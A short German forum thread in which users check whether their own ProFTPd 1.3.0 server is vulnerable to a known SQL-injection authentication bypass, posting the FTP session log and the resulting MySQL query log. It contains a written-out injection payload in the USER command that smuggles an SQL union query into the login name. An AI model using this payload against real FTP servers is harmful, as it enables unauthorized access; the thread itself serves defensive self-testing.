FYI: SQL Injection/Authentication Bypass in ProFTPd >1.3.0

Ich habs mal bei mir selbst versucht:

Code:
Status:	Verbindung hergestellt, warte auf Willkommensnachricht...
Antwort:	220 ProFTPD 1.3.0 Server (Debian) [85.25.73.214]
Befehl:	USER USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; --
Antwort:	331 Password required for USER.
Befehl:	PASS *
Antwort:	530 Login incorrect.
Fehler:	Herstellen der Verbindung zum Server fehlgeschlagen

Scheint sicher zu sein? :)
Ist v 1.3.0, also wohl ausserhalb der Gefahrenzone? ^^
 
Nein. Wenn du ganz sicher gehen willst, schalte das MySQL Query Log ein und sieh dir die Abfragen an, die bei der Datenbank ankommen.
 
Wirft mir aus:

Code:
 93 Query       SELECT userid, passwd, uid, gid, homedir, shell FROM ftpuser WHERE (userid='USER %\') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --') LIMIT 1

Scheint also richtig escaped zu sein und somit sicher? :)
 
Back
Top